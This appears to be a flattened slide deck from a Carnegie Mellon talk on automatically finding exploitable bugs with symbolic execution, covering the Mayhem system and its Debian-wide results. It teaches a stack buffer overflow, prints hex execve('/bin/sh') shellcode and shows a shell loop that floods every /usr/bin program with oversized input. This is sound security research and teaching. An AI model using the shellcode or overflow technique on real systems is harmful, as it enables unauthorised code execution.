Checking the World’s Software for Exploitable Bugs

Checking the World’s Software for Exploitable Bugs
David Brumley Carnegie Mellon University Stand up straight. PPW

vs. An epic battle White Black format c:
First sentence: I love computer security. I love that it’s an epic battle between white vs black, us vs them, good vs. evil. It’s the only area of computer science that brings alive the notion of an adversary. In security, adversaries really exist. format c:

Exploit bugs Bug White Black format c:

OK Exploit $ iwconfig accesspoint $ iwconfig # 01ad fce8 bfff c0 2f68 732f f 6e69 e e189 d231 0bb0 80cd Superuser

Bug Fixed! White Black format c:

Fact: Ubuntu Linux has over 99,000 known bugs

1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.
inp=`perl –e '{print "A"x8000}'` for program in /usr/bin/*; do for opt in {a..z} {A..Z}; do timeout –s 9 1s $program -$opt $inp done 1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.

Which bugs are exploitable?
Evil David

Plaid Parliament of Pwning CMU Hacking Team

DEF CON 2012 scoreboard CMU Time (3 days total)

A Manual Process

DEF CON 2013

I skate to where the puck is going to be, not where it has been.
--- Wayne Gretzky Hockey Hall of Fame

White Our Vision: Automatically Check the World’s Software for Exploitable Bugs

We owned the machine in seconds
Evil David

Verification, but with a twist
Correct Safe paths Verification Program Incorrect Exploit Correctness Property Un-exploitability Property 33,248 programs 152 new exploitable bugs

Outline Basic exploitation Symbolic execution for exploit generation
Automatic exploit generation on real code Experiments Related projects and the future

attacker gains control of execution
Control flow hijack attacker gains control of execution buffer overflow format string attack heap metadata overwrite use-after-free ... Same principle, different mechanism

Basic execution semantics of compiled code
Process Memory Instruction Pointer points to next instruction to execute Fetch, decode, execute Code Data ... Processor EIP ... Stack read and write Start with code in memory Heap Control Flow Hijack: EIP = Attacker Code

Buffer overflows and the runtime stack
int vulnerable(char *input) { char buf[32]; int x; if(...){ x = 1; } else { x = 0; } strcpy(buf,input); return x; execution semantics, including call/return local variables Control flow hijack when input length > buffer length Go over program.

locals allocated on stack
... char *input saved eip caller’s ebp 32 bytes for buf int x char *buf lower addresses vulnerable’s initial stack frame int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } locals allocated on stack

input = “ABC\0” Writes go up! ABC\0 int vulnerable(char *input) {
... char *input saved eip caller’s ebp 32 bytes for buf int x char *buf lower addresses writes Writes go up! ABC\0 int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }

“return address” Processor caller(){ i: vulnerable(input); i+1: ...
char *input saved eip caller’s ebp 32 bytes for buf int x char *buf caller(){ i: vulnerable(input); i+1: ... saved eip lower addresses ABC\0 int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } Processor EIP

Traditionally we show exploitability by running shellcode
A buffer overflow occurs when data is written outside of the space allocated for the buffer. C does not check that writes are in-bound ... char *input saved eip caller’s ebp 32 bytes for buf int x char *buf writes Classic Exploit: overwrite saved EIP The key here is predetermined allocation. * More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research Traditionally we show exploitability by running shellcode

Shellcode is a string execve(“/bin/sh”, 0, 0); Compile
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f \x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\xb0\x0b\xcd\x80 Executable String Author: kernel_panik,

input = shellcode . address of buf
... char *input saved eip caller’s ebp 32 bytes for buf int x char *buf &buf \x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f ... int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } &buf Processor EIP

Owned! input = shellcode . address of buf %eip = <shellcode>
... char *input saved eip caller’s ebp 32 bytes for buf int x char *buf %eip = <shellcode> execve(“/bin/sh”, NULL) Owned! &buf \x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f ... int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } &buf Processor EIP

Automatically finding exploitable bugs

Verification, but with a twist
Correct Safe path Verification Program Incorrect Exploitable Correctness Property Un-exploitability Property We use symbolic execution to test paths [Boyer75, Howden75, King76]

Basic symbolic execution
x = input() x can be anything x > 42 if x > 42 f t (x > 42) ∧ (x*x != MAXINT) if x*x = MAXINT Symbolic execution runs on symbolic input f t (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42) if x < 42 jmp stack[x] f t

Path formula (true for inputs that take path)
x = input() x can be anything x > 42 if x > 42 Path formula (true for inputs that take path) f t (x > 42) ∧ (x*x != MAXINT) if x*x = MAXINT Symbolic execution runs on symbolic input f t (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42) if x < 42 jmp stack[x] f t

Satisfiable (x = 43) x = input() path test case! Satisfiability Modulo Theory (SMT) Solver if x > 42 f t if x*x = MAXINT Symbolic execution runs on symbolic input f t (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42) if x < 42 jmp stack[x] f t

∧ (x*x != MAXINT) ∧ (x <= 42) UNSAT (infeasible) x = input() SMT Solver if x > 42 f t if x*x = MAXINT Symbolic execution runs on symbolic input f t if x < 42 jmp stack[x] f t

Checking non-exploitability
x = input() Un-exploitability property: EIP != user input if x > 42 f t (x > 42) ∧ (x*x == MAXINT) ∧ Un-exploitable if x*x = MAXINT f t if x < 42 jmp stack[x] f t

Checking non-exploitability
SAT (safe) UNSAT (exploit) ... char *input saved eip caller’s ebp 32 bytes for buf SMT <path formula> ∧ eip != user input For each path

Exploit generation can be cast as a verification problem.

Real world exploit generation a brief history
Ours Others 2005 Automatic Discovery of API-Level Exploits [Ganapathy et al., Conference on Software Engineering] 2008 Automatic Patch-Based Exploit Generation [Brumley et al., IEEE Security and Privacy Symposium] 2010 Automatic Generation of Control Flow Hijack Exploits for Commodity Software [Heelan, MS Thesis] 2011 Automatic Exploit Generation [Avgerinos et al., Network and Distributed System Security Symposium] Q: Exploit Hardening Made Easy [Schwartz et al., USENIX Security Symposium] 2012 Unleashing Mayhem on Binary Code [Cha et al., IEEE Security and Privacy Symposium] And >150 papers on symbolic execution

Exploiting Real Code: The Mayhem Architecture
Principles: Require only the binary e.g., BAP, our binary analysis platform Use intelligent analysis to reduce state space e.g., preconditioned symbolic execution Make queries to SMT as easy as possible e.g., symbolic memories

Potentially infinite state space
strcpy(buf, input); if (input[0] != 0) t f if (input[1] != 0) t f while(input[i] != 0){ buf[i] = input[i]; i++; } buf[i] = 0; … if (input[n] != 0) t f

check every branch blindly
if (input[0] != 0) t f if (input[1] != 0) if (input[n] != 0) … 20 min exploration 30 min exploration x min exploration Exploitable bug found KLEE [Cadar’08] does this

Preconditioned symbolic execution
All Inputs Trigger bug Preconditions focus search, e.g.: input > len Control Hijack input vs bugs doesn’t typecheck other examples in [Avgerinos11]

Static and online analysis determines likely exploit conditions
40 bytes All non-NULL ... char *input saved eip caller’s ebp 32 bytes for buf char buf[32]; int x; ... strcpy(buf, input);

Example: length precondition
Precondition Check: length(input) > 40 ∧ input[0] == 0 Unsatisfiable If (input[0] != 0) t f If (input[1] != 0) If (input[n] != 0) … Unsatisfiable Not explored. Saved 20 min Precondition Check: length(input) > 40 ∧ input[1] == 0 Not explored. Saved 30min Not explored. Saved x min Exploitable bug found

Don’t treat as a black box!
SAT. (x = 43) SMT Solver “program” the SMT Symbolic execution runs on symbolic input (x > 42) ∧ (x*x != 0xffffffff) ∧ !(x < 42)

Symbolic memory indices
x can be anything x := user_input(); <executed path> y := mem[x]; assert(y = 42); vulnerable(); Which memory cell contains 42? There are more causes… 232 cells to check Memory 232 -1

Symbolic addresses occur often
c = get_char(); ... to_lower(c); to_lower(char c){ c >= -128 && c < 256 ? tbl[c] : c; } ... a b c d tbl+’A’ Other causes Parsing: sscanf, vfprintf, etc. Character test: isspace, isalpha, etc. Conversion: toupper, tolower, mbtowc, etc. … Address is symbolic

Concretization: test case generation
e.g., SAGE, DART, CUTE, KLEE ✓ Solvable ✗ Exploits x := user_input(); <executed path> y := mem[30]; assert(y = 42); vulnerable(); Misses over 40% of exploits There are more causes… 1 cell to check Memory 232 -1 30

Observation Path formula constrains range of symbolic memory accesses
y = mem[x] assert(y==42) f t x > 0 x can be anything x < 5 0 < x < 5 Use symbolic execution state to: Step 1: Bound memory addresses referenced Step 2: Reduce to linear formulas

piecewise linear equations
Ind. Value 4 20 22 12 10 know: 0 < x < 5 y = mem[x] 40% more exploits (strength reduction) 1 y = - 2*x + 28 Index Value 10 12 22 20 See Paper for Details y = 2*x + 10

Experiments with Mayhem
Known exploitable bugs Coverage for 997 programs Checking Debian

2 Unknown Bugs: FreeRadius, GnuGol
[Cha et al, NDSS’12] Windows 2 Unknown Bugs: FreeRadius, GnuGol Linux

coverage 50% Unchecked 50% on average tested
Code coverage measures percentage of statements executed at least once by symbolic executor Mayhem coverage measured on 997 programs compiled with gcov from /usr/bin and /bin 50% Unchecked 50% on average tested

gcov coverage per program
Programs

Unique code lines covered
total unique lines (all programs): 2,245,632 lines covered (all programs): 437,455 absolute coverage: 19.48% Achieving 100% impossible due to dead code and other factors !

Checking Debian 152 new exploits 33,248 programs 2,727 days CPU time
15,914,407,892 SMT queries 199,685,594 test cases 2,365,154 crashes 28 cents a bug 21 dollars an exploit. 11,690 unique bugs 152 new exploits

public data

mining data Q: How long do queries take on average? A: 3.67ms on average with 0.34 variance Q: Should I optimize hard or easy formulae? A: 99.99% take less than 1 second and account for 78% of total time Q: Do queries get harder? A: Good question... > basicStat() Q. How many programs do you have? #program 957 Q. How many SMT formulae have you queried and solved (within timeout)? #query Q. Among those, how many are SAT? UNSAT? #sat #unsat Q. How many programs yield *fresh* formulae that take at least 1 second to solve? 563 Q. How many *distinct* SMT formulae take at least 1 second to solve? #formula 18663 Q. What are the basic statistics on the TIME it took to solve these formulae? bothtimesum sattimesum unsattimesum bothtimemax sattimemax unsattimemax bothtimeavg sattimeavg unsattimeavg bothtimevar sattimevar unsattimevar Q. What are the basic statistics on the number of VARIABLES in these formulae? bothvarsmax satvarsmax unsatvarsmax bothvarsavg satvarsavg unsatvarsavg bothvarsvar satvarsvar unsatvarsvar Q. What are the basic statistics on the number of CLAUSES in these formulae? bothclausesmax satclausesmax unsatclausesmax bothclausesavg satclausesavg unsatclausesavg bothclausesvar satclausesvar unsatclausesvar Q. What are the basic statistics on the number of AST Nodes in these formulae? bothastnodesmax satastnodesmax unsatastnodesmax bothastnodesavg satastnodesavg unsatastnodesavg bothastnodesvar satastnodesvar unsatastnodesvar Q. What are the basic statistics on the DEPTH of exploration when generating these formulae? bothdepthmax satdepthmax unsatdepthmax bothdepthavg satdepthavg unsatdepthavg bothdepthvar satdepthvar unsatdepthvar optimize fast queries

500 sec timeout No dominant upward trend in time to solve

Size not strongly correlated with hardness
SAT UNSAT

hardness is (likely) localized
Sym Exe. Thread Depth 0 (Pointer Res.) Depth 1 Depth 2 Hard Query

Only 39 programs create hard formulas
a/10 replaced with (a*0xcccccccd) >> 3

But each report is actionable.
We are not perfect We don’t claim to find all exploitable bugs “Exploitability” vs “safe” wrt to fixed input size Better symbolic execution <and many more reasons...> But each report is actionable.

symbolic execution thrusts
2. Binary Program Verification path merging, faster SMT 1. Formalize Exploit control flow hijack, information leaks, command injection 3. Real Code Handle messy details, transactional rollback

the larger pipeline BAP [Brumley11] Decompiler [Schwartz13]
15,546 vulns [Jang12] BAP [Brumley11] Decompiler [Schwartz13] 2 year total: 27,659 bugs 15,698 vulns Triage unpatched code clones scheduling Program Analysis symbolic execution static analysis fuzzing Check OS Distribution 423 from fuzzing + 15,546 from redebug from mayhem Weighted coupon bug collecting with randomized MAB algs. 1.55x more bugs [Woo13] Mayhem 11,690 bugs, 152 exploits [Cha11,Avgerinos12]

we’re not even close to done
GE A C Refinement-Based Component Analysis for Binary Code (DARPA, with Engler) Breaking the Satisfiability Barrier (NSF, with Tinelli and Barrett) High School Hacking Competition And others: SMT Hardness (w/ Williams) Exploiting multi-core for behavior-based detection and repair (NSF, w/ Mutlu, Mowry) Vetting commodity systems (DARPA, w/ Gligor, Jaeger) ....

It seems wrong to not try.
White Our Vision: Automatically Check the World’s Software for Exploitable Bugs It seems wrong to not try.

Thank You! Questions? Credits Postdocs: Manuel Egele Maverick Woo
PhD Students: Thanassis Avgerinos Tiffany Bao Sang Kil Cha Peter Chapman Samantha Gottlieb Jiyong Jang Matt Maurer Alex Rebert Ed Schwartz Jonathan Burket Undergrads: David Kohlbrenner Tyler Nighswander Brian Pak Collaborators: Robert Brumley Jonathan Diamond Brent Ledvina Special Thanks: Coherent Navigation Mike Carns Pete Kind Barbara McNamara Funding: Core Security DARPA Google Lockheed Martin Northrop Grumman NSA NSF SEI ODNI Symantec Microsoft Wiley Pearson Amazon AWS

Checking the World’s Software for Exploitable Bugs

Similar presentations

Presentation on theme: "Checking the World’s Software for Exploitable Bugs"— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

Checking the World’s Software for Exploitable Bugs

Similar presentations

Presentation on theme: "Checking the World’s Software for Exploitable Bugs"— Presentation transcript:

Similar presentations

About project

Feedback